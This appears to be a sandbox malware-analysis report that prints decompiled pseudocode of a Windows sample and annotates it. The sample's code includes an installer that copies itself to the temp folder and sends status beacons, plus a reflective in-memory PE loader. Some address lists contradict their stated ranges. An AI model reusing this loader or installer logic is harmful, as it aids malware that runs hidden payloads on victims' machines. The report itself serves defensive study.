                                                                                                                                                • LeaveCriticalSection.KERNEL32(00000000,?,?,?,0040167D,?,?,?,00000000,00000000,00000004), ref: 00404689
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000001.00000002.259729794.0000000000401000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Similarity
                                                                                                                                                • API ID: CriticalSection$EnterLeave$H_prolog
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 1633115879-0
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                Executed Functions

                                                                                                                                                C-Code - Quality: 88%
                                                                                                                                                			E100204C0(void* __ebx, void* __edi, void* __eflags) {
                                                                                                                                                				int _v8;
                                                                                                                                                				intOrPtr _v16;
                                                                                                                                                				char _v44;
                                                                                                                                                				char _v311;
                                                                                                                                                				char _v312;
                                                                                                                                                				char _v575;
                                                                                                                                                				char _v576;
                                                                                                                                                				long _v580;
                                                                                                                                                				intOrPtr _v584;
                                                                                                                                                				intOrPtr _v588;
                                                                                                                                                				intOrPtr _v592;
                                                                                                                                                				intOrPtr _v596;
                                                                                                                                                				intOrPtr _v600;
                                                                                                                                                				intOrPtr _v604;
                                                                                                                                                				intOrPtr _v608;
                                                                                                                                                				intOrPtr _v612;
                                                                                                                                                				intOrPtr _v616;
                                                                                                                                                				intOrPtr _v620;
                                                                                                                                                				intOrPtr _v624;
                                                                                                                                                				intOrPtr _v628;
                                                                                                                                                				void* __esi;
                                                                                                                                                				void* _t46;
                                                                                                                                                				int _t47;
    void* _t56;
    void* _t57;
    intOrPtr _t73;
    int _t75;
    int _t77;
    void* _t101;
    intOrPtr _t104;
    void* _t108;
    void* _t109;
    void* _t111;
    intOrPtr _t114;
    void* _t115;
    intOrPtr _t116;
    intOrPtr _t118;
    intOrPtr _t120;
    void* _t125;

    _t125 = __eflags;
    _t100 = __edi;
    _t82 = __ebx;
    _push(0xffffffff);
    _push(E10022D01);
    _push( *[fs:0x0]);
     *[fs:0x0] = _t104;
    _push(_t101);
    E1001FD60();
    _v312 = 0;
    E1000CF20(__edi,  &_v311, 0, 0x103);
    GetModuleFileNameA(0,  &_v312, 0x104);
    E1001A600(__ebx, _t100, _t101, _t125,  &_v44); // executed
    _v8 = 0;
    _t46 = E10001A50( &_v312, E100011E0( &_v44));
    _t108 = _t104 - 0x264 + 0x18;
    _t126 = _t46;
    if(_t46 == 0) {
        _t47 = E1001A0F0("Global\\exist_sign__install_r3");
        _t109 = _t108 + 4;
        __eflags = _t47;
        if(_t47 == 0) {
            _v576 = 0;
            E1000CF20(_t100,  &_v575, 0, 0x103);
            GetTempPathA(0x104,  &_v576);
            E1000CD96( &_v576,  &_v576, 0x104, E100011E0( &_v44));
            _t111 = _t109 + 0x18;
            CopyFileA( &_v312,  &_v576, 0);
            _v580 = GetTickCount();
            while(1) {
                _t56 = E1001A170( &_v312);
                _t102 = _t56;
                _t57 = E1001A170( &_v576);
                _t111 = _t111 + 8;
                __eflags = _t56 - _t57;
                if(__eflags == 0) {
                    break;
                }
                Sleep(0x3e8);
                __eflags = GetTickCount() - _v580 - 0x7530;
                if(__eflags <= 0) {
                    continue;
                } else {
                }
                break;
            }
            E1001FDB0();
            E1001FF90(_t82, _t100, _t102, __eflags, "install", "installp3", "-0.3", "46.0.0", "exe");
            _t114 = _t111 + 0x14 - 0x1c;
            _t89 = _t114;
            _v588 = _t114;
            _v612 = E10001160(_t114, __eflags, "status=main_start");
            E10020180(_t82, _t100, _t102, __eflags);
            _t115 = _t114 + 0x1c;
            __eflags = PathFileExistsA("C:\\hijack");
            if(__eflags != 0) {
                L15:
                _t116 = _t115 - 0x1c;
                _v592 = _t116;
                _v616 = E10001160(_t116, __eflags, "status=check_debug");
                E10020180(_t82, _t100, _t102, __eflags);
                _t118 = _t116 + 0x1c - 0x1c;
                _v596 = _t118;
                _v620 = E10001160(_t118, __eflags, "installp3");
                E1001FEA0(_t82, _t100, _t102, __eflags);
                _t120 = _t118 + 0x1c - 0x1c;
                _v600 = _t120;
                _v624 = E10001160(_t120, __eflags, "installp3");
                E1001FDC0(_t82, _t100, _t102, __eflags);
                _v604 = _t120 + 0x1c - 0x1c;
                _v628 = E10001160(_t120 + 0x1c - 0x1c, __eflags, "status=main_over");
                E10020180(_t82, _t100, _t102, __eflags);
            } else {
                E1001A0A0();
                _t75 = E1001A0B0(_t89);
                __eflags = _t75;
                if(_t75 == 0) {
                    L12:
                } else {
                    __eflags = E10019D10();
                    if(__eflags == 0) {
                        _t77 = E1001FA30(_t82, _t100, _t102, __eflags, 0x3e8, 0);
                        _t115 = _t115 + 8;
                        __eflags = _t77;
                        if(__eflags != 0) {
                            goto L15;
                        } else {
                        }
                    } else {
                        goto L12;
                    }
                }
            }
        } else {
        }
        E1001A260();
        _v608 = 1;
        _v8 = 0xffffffff;
        E100011A0( &_v44);
        _t73 = _v608;
    } else {
        E10020A80(__ebx, _t100, _t101, _t126, "46.0.0"); // executed
        _v584 = 1;
        _v8 = 0xffffffff;
        E100011A0( &_v44);
        _t73 = _v584;
    }
     *[fs:0x0] = _v16;
    return _t73;
}
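What this listing shows, in order: a single-instance guard on the named mutex Global\exist_sign__install_r3 (E1001A0F0); a copy of the running image (GetModuleFileNameA) into the directory returned by GetTempPathA via CopyFileA; a polling loop that compares E1001A170 of the source and the copy once per second (Sleep(0x3e8)) and gives up after 0x7530 ms, i.e. 30 s; and, regardless of how that loop ended, the "status=main_start" beacon. The PathFileExistsA("C:\\hijack") test is a gate: when the path exists, the three pre-checks (E1001A0B0, E10019D10, E1001FA30) in the else branch are skipped and control jumps straight to L15, the "status=check_debug" / "installp3" stage. The model below is an added example written for this report, not code from the sample or from the sandbox. It assumes E1001A170 returns a comparable per-file value (size or hash) and that the strings are stored as plain ASCII in the image; the byte blob it scans is constructed, not taken from the sample.

```python
"""Model of the installer logic visible in the decompiled listing above.

Added illustration, not the sample's own code.  Assumptions: E1001A170
yields a comparable per-file value (size or hash); the strings are plain
ASCII in the image; the copy-wait loop's outcome is not checked by the
caller (the listing calls E1001FDB0 right after the loop either way).
"""
import re

MUTEX_NAME = b"Global\\exist_sign__install_r3"      # E1001A0F0 argument
KILL_SWITCH_PATH = b"C:\\hijack"                     # PathFileExistsA argument
BEACONS = (b"status=main_start", b"status=check_debug", b"status=main_over")
VERSION_TAG = b"46.0.0"
POLL_SLEEP_MS = 0x3E8     # Sleep(0x3e8): one second between comparisons
POLL_TIMEOUT_MS = 0x7530  # GetTickCount() delta compared against 0x7530: 30 s

# Constructed blob standing in for a memory dump or the unpacked image.
SAMPLE_IMAGE = (b"MZ" + b"\x00" * 14 + MUTEX_NAME + b"\x00" + KILL_SWITCH_PATH
                + b"\x00" + BEACONS[0] + b"\x00" + VERSION_TAG + b"\x00")


def extract_iocs(image: bytes) -> dict:
    """Return {label: [offsets]} for every hard-coded string found in image."""
    needles = [("mutex", MUTEX_NAME), ("kill_switch", KILL_SWITCH_PATH),
               ("version", VERSION_TAG)]
    needles += [("beacon:" + b.decode(), b) for b in BEACONS]
    found = {}
    for label, needle in needles:
        offsets = [m.start() for m in re.finditer(re.escape(needle), image)]
        if offsets:
            found[label] = offsets
    return found


def wait_for_copy(value_of, src, dst, clock_ms, sleep_ms,
                  timeout_ms=POLL_TIMEOUT_MS):
    """The GetTickCount/Sleep loop: compare first, sleep, then test the
    timeout, so the copy is re-checked at most once per second and never
    after the 30 s budget is exceeded.  Returns (matched, elapsed_ms)."""
    start = clock_ms()                      # _v580 = GetTickCount()
    while True:
        if value_of(src) == value_of(dst):  # E1001A170(src) == E1001A170(dst)
            return True, clock_ms() - start
        sleep_ms(POLL_SLEEP_MS)
        if clock_ms() - start > timeout_ms:  # (now - _v580) - 0x7530 > 0
            return False, clock_ms() - start


def simulate_copy_wait(settle_after_ms):
    """Drive wait_for_copy with a fake clock.  settle_after_ms=None models a
    copy that never matches (e.g. CopyFileA failed silently)."""
    now = [0]
    src_value = 0x1234

    def clock_ms():
        return now[0]

    def sleep_ms(ms):
        now[0] += ms

    def value_of(path):
        if path == "src":
            return src_value
        if settle_after_ms is not None and now[0] >= settle_after_ms:
            return src_value
        return 0

    return wait_for_copy(value_of, "src", "dst", clock_ms, sleep_ms)


def reaches_payload(hijack_marker, a_nonzero, b_zero, c_nonzero):
    """Gate in front of the 'installp3' stage (label L15).  If C:\\hijack
    exists the three pre-checks are bypassed; otherwise all three must pass:
    E1001A0B0 != 0, E10019D10 == 0, E1001FA30(0x3e8, 0) != 0."""
    if hijack_marker:
        return True
    return a_nonzero and b_zero and c_nonzero


if __name__ == "__main__":
    print(extract_iocs(SAMPLE_IMAGE))
    print(simulate_copy_wait(3000), simulate_copy_wait(None))
    print(reaches_payload(True, False, False, False))
```

Two analyst-relevant properties fall out of the model: the loop never re-compares after the budget is spent, and its result is discarded, so a failed or slow copy does not stop the installer; and a bare directory named C:\hijack is enough to skip the pre-checks, which is worth remembering when deciding how to instrument a detonation.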
Instruction addresses for the listing above (decompiler gutter, one entry per pseudocode line, 0x100204c0 through 0x10020754; entries of 0x00000000 mark lines with no mapped address).
                                                                                                                                                0x00000000
                                                                                                                                                0x1002058b
                                                                                                                                                0x1002075c
                                                                                                                                                0x10020761
                                                                                                                                                0x1002076b
                                                                                                                                                0x10020775
                                                                                                                                                0x1002077a
                                                                                                                                                0x10020544
                                                                                                                                                0x10020549
                                                                                                                                                0x10020551
                                                                                                                                                0x1002055b
                                                                                                                                                0x10020565
                                                                                                                                                0x1002056a
                                                                                                                                                0x1002056a
                                                                                                                                                0x10020783
                                                                                                                                                0x1002078e

                                                                                                                                                APIs
                                                                                                                                                • _memset.LIBCMT ref: 100204F9
                                                                                                                                                • GetModuleFileNameA.KERNEL32(00000000,00000000,00000104), ref: 1002050F
                                                                                                                                                  • Part of subcall function 1001A600: _memset.LIBCMT ref: 1001A651
                                                                                                                                                  • Part of subcall function 1001A600: GetModuleFileNameA.KERNEL32(00000000,00000000,00000104), ref: 1001A667
                                                                                                                                                  • Part of subcall function 1001A600: _sprintf.LIBCMT ref: 1001A6A5
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000004.00000002.389655641.0000000010001000.00000020.00000001.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                 • Associated: 00000004.00000002.389597489.0000000010000000.00000004.00000001.sdmp
                                                                                                                                                 • Associated: 00000004.00000002.389720562.0000000010023000.00000002.00000001.sdmp
                                                                                                                                                 • Associated: 00000004.00000002.390103749.0000000010332000.00000004.00000001.sdmp
                                                                                                                                                 • Associated: 00000004.00000002.390114476.0000000010337000.00000002.00000001.sdmp
                                                                                                                                                 • Associated: 00000004.00000002.390121768.0000000010338000.00000004.00000001.sdmp
                                                                                                                                                Similarity
                                                                                                                                                • API ID: FileModuleName_memset$_sprintf
                                                                                                                                                • String ID: -0.3$46.0.0$46.0.0$C:\hijack$Global\exist_sign__install_r3$exe$install$installp3$installp3$installp3$status=check_debug$status=main_over$status=main_start
                                                                                                                                                • API String ID: 3079340674-908818648
                                                                                                                                                • Opcode ID: 5b46908abf91a186510f920af5aff9a3b619072a939ffc6013e13a21394ecda3
                                                                                                                                                • Instruction ID: c22925573318c8528c32417883aa4fd6f710712ddf5f47052043116b831c363f
                                                                                                                                                • Opcode Fuzzy Hash: 5b46908abf91a186510f920af5aff9a3b619072a939ffc6013e13a21394ecda3
                                                                                                                                                • Instruction Fuzzy Hash: 0951B2B5D04318ABEB20EBA4DC4BBDE7775DB10344F400194F90966182EB31BB84CFA2
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                C-Code - Quality: 50%
                                                                                                                                                 			E10019780(void* __ebx, void* __esi, intOrPtr _a4, char _a8, intOrPtr _a36, intOrPtr* _a40, intOrPtr* _a44) {
                                                                                                                                                 				char _v8;
                                                                                                                                                 				char _v12;
                                                                                                                                                 				void* _t45;
                                                                                                                                                 
                                                                                                                                                 				_v8 = 0;
                                                                                                                                                 				_v12 = 0;
                                                                                                                                                 				// First call with a NULL buffer and size 0: only the required size is written to *_a44.
                                                                                                                                                 				__imp__SetupDiGetDeviceRegistryPropertyA(_a4,  &_a8, _a36,  &_v12, 0, 0, _a44); // executed
                                                                                                                                                 				// 0x7a == ERROR_INSUFFICIENT_BUFFER, the expected result of the size query.
                                                                                                                                                 				if(GetLastError() == 0x7a) {
                                                                                                                                                 					// Allocate *_a44 bytes (L1000CE56 appears to be the heap allocator) and zero them
                                                                                                                                                 					// (E1000CF20 wraps _memset, per the API list below), then fetch the property value.
                                                                                                                                                 					 *_a40 = L1000CE56(__ebx, _a44, _t45, __esi,  *_a44);
                                                                                                                                                 					E1000CF20(_t45,  *_a40, 0,  *_a44);
                                                                                                                                                 					__imp__SetupDiGetDeviceRegistryPropertyA(_a4,  &_a8, _a36,  &_v12,  *_a40,  *_a44, 0); // executed
                                                                                                                                                 					_v8 = 1;
                                                                                                                                                 				}
                                                                                                                                                 				// Returns 1 if the property was read into *_a40, 0 otherwise.
                                                                                                                                                 				return _v8;
                                                                                                                                                 			}

                                                                                                                                                APIs
                                                                                                                                                • SetupDiGetDeviceRegistryPropertyA.SETUPAPI(00000000,?,?,00000000,00000000,00000000,?), ref: 100197AC
                                                                                                                                                • GetLastError.KERNEL32 ref: 100197B2
                                                                                                                                                • _memset.LIBCMT ref: 100197DE
                                                                                                                                                • SetupDiGetDeviceRegistryPropertyA.SETUPAPI(00000000,?,00000000,00000000,?,?,00000000), ref: 10019804
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000004.00000002.389655641.0000000010001000.00000020.00000001.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                 • Associated: 00000004.00000002.389597489.0000000010000000.00000004.00000001.sdmp
                                                                                                                                                 • Associated: 00000004.00000002.389720562.0000000010023000.00000002.00000001.sdmp
                                                                                                                                                 • Associated: 00000004.00000002.390103749.0000000010332000.00000004.00000001.sdmp
                                                                                                                                                 • Associated: 00000004.00000002.390114476.0000000010337000.00000002.00000001.sdmp
                                                                                                                                                 • Associated: 00000004.00000002.390121768.0000000010338000.00000004.00000001.sdmp
                                                                                                                                                Similarity
                                                                                                                                                • API ID: DevicePropertyRegistrySetup$ErrorLast_memset
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 895502402-0
                                                                                                                                                • Opcode ID: 6adbbad0e525441aa34f394d1e709c810f69e4a50dd3602c5c2cb0cc2a6a471c
                                                                                                                                                • Instruction ID: f8922b701b9361cc18bff0ab125b4374f9cfd65e033693ba824ef8b8be46b605
                                                                                                                                                • Opcode Fuzzy Hash: 6adbbad0e525441aa34f394d1e709c810f69e4a50dd3602c5c2cb0cc2a6a471c
                                                                                                                                                • Instruction Fuzzy Hash: 8C1193B9610208BBDB04DF98D895FDA77B9AB49304F108259F9099B284D631EA85CBA1
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                C-Code - Quality: 100%
                                                                                                                                                 			E1001A170(CHAR* _a4) {
                                                                                                                                                 				struct _WIN32_FIND_DATAA _v324;
                                                                                                                                                 				intOrPtr _v328;
                                                                                                                                                 				void* _v332;
                                                                                                                                                 				void* _t11;
                                                                                                                                                 
                                                                                                                                                 				// Returns the low 32 bits of the size of the first file matching _a4, or 0 if none is found.
                                                                                                                                                 				_v328 = 0;
                                                                                                                                                 				_t11 = FindFirstFileA(_a4,  &_v324); // executed
                                                                                                                                                 				_v332 = _t11;
                                                                                                                                                 				if(_v332 != 0xffffffff) { // 0xffffffff == INVALID_HANDLE_VALUE
                                                                                                                                                 					_v328 = _v324.nFileSizeLow;
                                                                                                                                                 				}
                                                                                                                                                 				// FindClose is called unconditionally, even when the handle is INVALID_HANDLE_VALUE.
                                                                                                                                                 				FindClose(_v332); // executed
                                                                                                                                                 				return _v328;
                                                                                                                                                 			}

                                                                                                                                                APIs
                                                                                                                                                • FindFirstFileA.KERNEL32(1001A679,?), ref: 1001A18E
                                                                                                                                                • FindClose.KERNEL32(000000FF), ref: 1001A1B6
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000004.00000002.389655641.0000000010001000.00000020.00000001.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                 • Associated: 00000004.00000002.389597489.0000000010000000.00000004.00000001.sdmp
                                                                                                                                                 • Associated: 00000004.00000002.389720562.0000000010023000.00000002.00000001.sdmp
                                                                                                                                                 • Associated: 00000004.00000002.390103749.0000000010332000.00000004.00000001.sdmp
                                                                                                                                                 • Associated: 00000004.00000002.390114476.0000000010337000.00000002.00000001.sdmp
                                                                                                                                                 • Associated: 00000004.00000002.390121768.0000000010338000.00000004.00000001.sdmp
                                                                                                                                                Similarity
                                                                                                                                                • API ID: Find$CloseFileFirst
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 2295610775-0
                                                                                                                                                • Opcode ID: 0d0f7e1b90d12563d86b766f37a796064df2748116d1dddbb477bfb1d1da362b
                                                                                                                                                • Instruction ID: 097559f34e7186eb2c7e5fd791b7ca3a953ceb1394cb31efbd5b4482c630521c
                                                                                                                                                • Opcode Fuzzy Hash: 0d0f7e1b90d12563d86b766f37a796064df2748116d1dddbb477bfb1d1da362b
                                                                                                                                                • Instruction Fuzzy Hash: 66F0C974D0022C9BDB70DF64DD88BDDB7B8AB48310F1042D4E91DA32A0DA30AED58F50
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                C-Code - Quality: 73%
                                                                                                                                                			E1001B620(void* __ebx, void* __edi, void* __esi, signed short* _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28, intOrPtr _a32) {
                                                                                                                                                				intOrPtr _v8;
                                                                                                                                                				intOrPtr _v12;
                                                                                                                                                				signed short* _v16;
                                                                                                                                                				intOrPtr _v20;
                                                                                                                                                				intOrPtr _v24;
                                                                                                                                                				_Unknown_base(*)()* _v28;
                                                                                                                                                				intOrPtr _v32;
                                                                                                                                                				signed int _v36;
                                                                                                                                                				intOrPtr _v68;
                                                                                                                                                				char _v72;
                                                                                                                                                				void* _v76;
                                                                                                                                                				intOrPtr _v80;
                                                                                                                                                				intOrPtr* _v84;
                                                                                                                                                				intOrPtr _v88;
                                                                                                                                                				intOrPtr _v92;
                                                                                                                                                				intOrPtr _v96;
                                                                                                                                                				intOrPtr _v100;
                                                                                                                                                				void* _t170;
                                                                                                                                                				void* _t173;
                                                                                                                                                				void* _t182;
                                                                                                                                                				intOrPtr _t184;
                                                                                                                                                				void* _t194;
                                                                                                                                                				void* _t203;
                                                                                                                                                				void* _t206;
                                                                                                                                                				void* _t207;
                                                                                                                                                				void* _t209;
                                                                                                                                                				intOrPtr _t220;
                                                                                                                                                				intOrPtr _t225;
                                                                                                                                                				void* _t239;
                                                                                                                                                				intOrPtr _t311;
                                                                                                                                                				void* _t326;
                                                                                                                                                				void* _t327;
                                                                                                                                                				void* _t328;
                                                                                                                                                				void* _t329;
                                                                                                                                                				void* _t330;
                                                                                                                                                				void* _t332;
                                                                                                                                                				void* _t333;
                                                                                                                                                				void* _t334;
                                                                                                                                                				void* _t337;
                                                                                                                                                				void* _t338;
                                                                                                                                                				void* _t339;
                                                                                                                                                
                                                                                                                                                				_t327 = __esi;
                                                                                                                                                				_t326 = __edi;
                                                                                                                                                				_t239 = __ebx;
                                                                                                                                                				_v76 = 0;
                                                                                                                                                				_v20 = 0;
                                                                                                                                                 				_v28 = GetProcAddress(GetModuleHandleA("kernel32.dll"), "GetNativeSystemInfo"); // resolved at runtime; used below to read SYSTEM_INFO.dwPageSize
                                                                                                                                                				_t170 = E1001AE40(_a8, 0x40);
                                                                                                                                                				_t329 = _t328 + 8;
                                                                                                                                                				if(_t170 != 0) {
                                                                                                                                                					_v16 = _a4;
                                                                                                                                                 					if(( *_v16 & 0x0000ffff) == 0x5a4d) { // IMAGE_DOS_HEADER.e_magic == "MZ"
                                                                                                                                                						_t9 =  &(_v16[0x1e]); // 0xc707ebe8
                                                                                                                                                						_t173 = E1001AE40(_a8,  *_t9 + 0xf8);
                                                                                                                                                						_t330 = _t329 + 8;
                                                                                                                                                						if(_t173 != 0) {
                                                                                                                                                							_t13 =  &(_v16[0x1e]); // 0xc707ebe8
                                                                                                                                                							_v84 = _a4 +  *_t13;
                                                                                                                                                 							if( *_v84 == 0x4550) { // _v84 = IMAGE_NT_HEADERS at e_lfanew; Signature == "PE\0\0"
                                                                                                                                                 								if(( *(_v84 + 4) & 0x0000ffff) == 0x14c) { // FileHeader.Machine == IMAGE_FILE_MACHINE_I386 (32-bit only)
                                                                                                                                                 									if(( *(_v84 + 0x38) & 0x00000001) == 0) { // OptionalHeader.SectionAlignment must be even
                                                                                                                                                 										_v88 = _v84 + ( *(_v84 + 0x14) & 0x0000ffff) + 0x18; // first IMAGE_SECTION_HEADER = NT headers + 0x18 + SizeOfOptionalHeader
                                                                                                                                                 										_v36 =  *(_v84 + 0x38); // SectionAlignment, used for sections with SizeOfRawData == 0
                                                                                                                                                										_v12 = 0;
                                                                                                                                                										while(_v12 < ( *(_v84 + 6) & 0x0000ffff)) {
                                                                                                                                                											if( *((intOrPtr*)(_v88 + 0x10)) != 0) {
                                                                                                                                                												_v92 =  *((intOrPtr*)(_v88 + 0xc)) +  *((intOrPtr*)(_v88 + 0x10));
                                                                                                                                                											} else {
                                                                                                                                                												_v92 =  *((intOrPtr*)(_v88 + 0xc)) + _v36;
                                                                                                                                                											}
                                                                                                                                                											if(_v92 > _v20) {
                                                                                                                                                												_v20 = _v92;
                                                                                                                                                											}
                                                                                                                                                											_v12 = _v12 + 1;
                                                                                                                                                											_v88 = _v88 + 0x28;
                                                                                                                                                										}
                                                                                                                                                 										_v28( &_v72); // GetNativeSystemInfo(&si); _v68 is si.dwPageSize
                                                                                                                                                 										_v32 = E1001AE80( *((intOrPtr*)(_v84 + 0x50)), _v68); // align SizeOfImage up to the page size
                                                                                                                                                 										_t182 = E1001AE80(_v20, _v68); // align end of the highest section up to the page size
                                                                                                                                                 										_t332 = _t330 + 0x10;
                                                                                                                                                 										if(_v32 == _t182) { // image is rejected (ERROR_BAD_EXE_FORMAT) unless the two agree
                                                                                                                                                 											_t184 = _a12( *((intOrPtr*)(_v84 + 0x34)), _v32, 0x3000, 4, _a32); // caller-supplied VirtualAlloc-style callback: try preferred ImageBase, MEM_RESERVE|MEM_COMMIT, PAGE_READWRITE, user data
                                                                                                                                                											_t333 = _t332 + 0x14;
                                                                                                                                                											_v24 = _t184;
                                                                                                                                                											if(_v24 != 0) {
                                                                                                                                                												L26:
                                                                                                                                                												_v76 = HeapAlloc(GetProcessHeap(), 8, 0x40);
                                                                                                                                                												if(_v76 != 0) {
                                                                                                                                                													 *((intOrPtr*)(_v76 + 4)) = _v24;
                                                                                                                                                													asm("sbb ecx, ecx");
                                                                                                                                                 													 *(_v76 + 0x14) =  ~( ~( *(_v84 + 0x16) & 0x2000)); // isDLL = FileHeader.Characteristics & IMAGE_FILE_DLL
                                                                                                                                                													 *((intOrPtr*)(_v76 + 0x1c)) = _a12;
                                                                                                                                                													 *((intOrPtr*)(_v76 + 0x20)) = _a16;
                                                                                                                                                													 *((intOrPtr*)(_v76 + 0x24)) = _a20;
                                                                                                                                                													 *((intOrPtr*)(_v76 + 0x28)) = _a24;
                                                                                                                                                													 *((intOrPtr*)(_v76 + 0x2c)) = _a28;
                                                                                                                                                													 *((intOrPtr*)(_v76 + 0x34)) = _a32;
                                                                                                                                                													 *((intOrPtr*)(_v76 + 0x3c)) = _v68;
                                                                                                                                                													_t194 = E1001AE40(_a8,  *((intOrPtr*)(_v84 + 0x54)));
                                                                                                                                                													_t334 = _t333 + 8;
                                                                                                                                                													if(_t194 != 0) {
                                                                                                                                                 														_v8 = _a12(_v24,  *((intOrPtr*)(_v84 + 0x54)), 0x1000, 4, _a32); // commit SizeOfHeaders bytes at the new base (MEM_COMMIT, PAGE_READWRITE)
                                                                                                                                                 														E1000D190(_t239, _t326, _t327, _v8, _v16,  *((intOrPtr*)(_v84 + 0x54))); // copy the headers from the raw image into the mapped copy
                                                                                                                                                														_t121 =  &(_v16[0x1e]); // 0xc707ebe8
                                                                                                                                                														 *_v76 = _v8 +  *_t121;
                                                                                                                                                														 *((intOrPtr*)( *_v76 + 0x34)) = _v24;
                                                                                                                                                														_t203 = E1001B300(_t239, _t326, _t327, _a4, _a8, _v84, _v76); // executed
                                                                                                                                                														_t337 = _t334 + 0x30;
                                                                                                                                                														if(_t203 != 0) {
                                                                                                                                                 															_t311 =  *((intOrPtr*)( *_v76 + 0x34)) -  *((intOrPtr*)(_v84 + 0x34)); // relocation delta = actual base - preferred ImageBase
                                                                                                                                                 															_v80 = _t311;
                                                                                                                                                 															if(_t311 == 0) { // loaded at the preferred base: no relocation needed
                                                                                                                                                 																 *((intOrPtr*)(_v76 + 0x18)) = 1;
                                                                                                                                                															} else {
                                                                                                                                                																_t220 = E1001B0C0(_v76, _v80);
                                                                                                                                                																_t337 = _t337 + 8;
                                                                                                                                                																 *((intOrPtr*)(_v76 + 0x18)) = _t220;
                                                                                                                                                															}
                                                                                                                                                															_t206 = E1001AB60(_v76); // executed
                                                                                                                                                															_t338 = _t337 + 4;
                                                                                                                                                															if(_t206 != 0) {
                                                                                                                                                																_t207 = E1001B490(_v76); // executed
                                                                                                                                                																_t339 = _t338 + 4;
                                                                                                                                                																if(_t207 != 0) {
                                                                                                                                                																	_t209 = E1001AD80(_v76);
                                                                                                                                                																	_t339 = _t339 + 4;
                                                                                                                                                																	if(_t209 != 0) {
                                                                                                                                                																		if( *((intOrPtr*)( *_v76 + 0x28)) == 0) {
                                                                                                                                                																			 *((intOrPtr*)(_v76 + 0x38)) = 0;
                                                                                                                                                																			L49:
                                                                                                                                                																			return _v76;
                                                                                                                                                																		}
                                                                                                                                                																		if( *(_v76 + 0x14) == 0) {
                                                                                                                                                																			 *((intOrPtr*)(_v76 + 0x38)) = _v24 +  *((intOrPtr*)( *_v76 + 0x28));
                                                                                                                                                																			L47:
                                                                                                                                                																			goto L49;
                                                                                                                                                																		}
                                                                                                                                                 																		_v100 = _v24 +  *((intOrPtr*)( *_v76 + 0x28)); // base + OptionalHeader.AddressOfEntryPoint
                                                                                                                                                 																		_v96 = _v100(_v24, 1, 0); // DllMain(hinstDLL, DLL_PROCESS_ATTACH, NULL)
                                                                                                                                                																		if(_v96 != 0) {
                                                                                                                                                																			 *((intOrPtr*)(_v76 + 0x10)) = 1;
                                                                                                                                                																			goto L47;
                                                                                                                                                																		}
                                                                                                                                                 																		SetLastError(0x45a); // ERROR_DLL_INIT_FAILED
                                                                                                                                                																		L50:
                                                                                                                                                																		E1001A960(_v76);
                                                                                                                                                																		return 0;
                                                                                                                                                																	}
                                                                                                                                                																	goto L50;
                                                                                                                                                																}
                                                                                                                                                																goto L50;
                                                                                                                                                															}
                                                                                                                                                															goto L50;
                                                                                                                                                														}
                                                                                                                                                														goto L50;
                                                                                                                                                													}
                                                                                                                                                													goto L50;
                                                                                                                                                												}
                                                                                                                                                 												_a16(_v24, 0, 0x8000, _a32); // free callback: VirtualFree-style, MEM_RELEASE
                                                                                                                                                 												SetLastError(0xe); // ERROR_OUTOFMEMORY
                                                                                                                                                												return 0;
                                                                                                                                                											}
                                                                                                                                                											_t225 = _a12(0, _v32, 0x3000, 4, _a32);
                                                                                                                                                											_t333 = _t333 + 0x14;
                                                                                                                                                											_v24 = _t225;
                                                                                                                                                											if(_v24 != 0) {
                                                                                                                                                												goto L26;
                                                                                                                                                											}
                                                                                                                                                 											SetLastError(0xe); // ERROR_OUTOFMEMORY
                                                                                                                                                											return 0;
                                                                                                                                                										}
                                                                                                                                                 										SetLastError(0xc1); // ERROR_BAD_EXE_FORMAT (same code for every header check below)
                                                                                                                                                										return 0;
                                                                                                                                                									}
                                                                                                                                                									SetLastError(0xc1);
                                                                                                                                                									return 0;
                                                                                                                                                								}
                                                                                                                                                								SetLastError(0xc1);
                                                                                                                                                								return 0;
                                                                                                                                                							}
                                                                                                                                                							SetLastError(0xc1);
                                                                                                                                                							return 0;
                                                                                                                                                						}
                                                                                                                                                						return 0;
                                                                                                                                                					}
                                                                                                                                                					SetLastError(0xc1);
                                                                                                                                                					return 0;
                                                                                                                                                				}
                                                                                                                                                				return 0;
                                                                                                                                                			}
                                                                                                                                                 Instruction addresses of this function (0x1001b620 to 0x1001b792), one per decompiled statement: 0x1001b620 0x1001b620 0x1001b620 0x1001b626 0x1001b62d 0x1001b64b 0x1001b654 0x1001b659 0x1001b65e 0x1001b66a 0x1001b678 0x1001b68f 0x1001b69d 0x1001b6a2 0x1001b6a7 0x1001b6b6 0x1001b6b9 0x1001b6c5 0x1001b6e6 0x1001b703 0x1001b725 0x1001b72e 0x1001b731 0x1001b74c 0x1001b75f 0x1001b77b 0x1001b761 0x1001b76a 0x1001b76a 0x1001b784 0x1001b789 0x1001b789 0x1001b740 0x1001b749 0x1001b749 0x1001b792
                                                                                                                                                0x1001b7a8
                                                                                                                                                0x1001b7b3
                                                                                                                                                0x1001b7b8
                                                                                                                                                0x1001b7be
                                                                                                                                                0x1001b7e8
                                                                                                                                                0x1001b7eb
                                                                                                                                                0x1001b7ee
                                                                                                                                                0x1001b7f5
                                                                                                                                                0x1001b826
                                                                                                                                                0x1001b837
                                                                                                                                                0x1001b83e
                                                                                                                                                0x1001b86a
                                                                                                                                                0x1001b87c
                                                                                                                                                0x1001b883
                                                                                                                                                0x1001b88c
                                                                                                                                                0x1001b895
                                                                                                                                                0x1001b89e
                                                                                                                                                0x1001b8a7
                                                                                                                                                0x1001b8b0
                                                                                                                                                0x1001b8b9
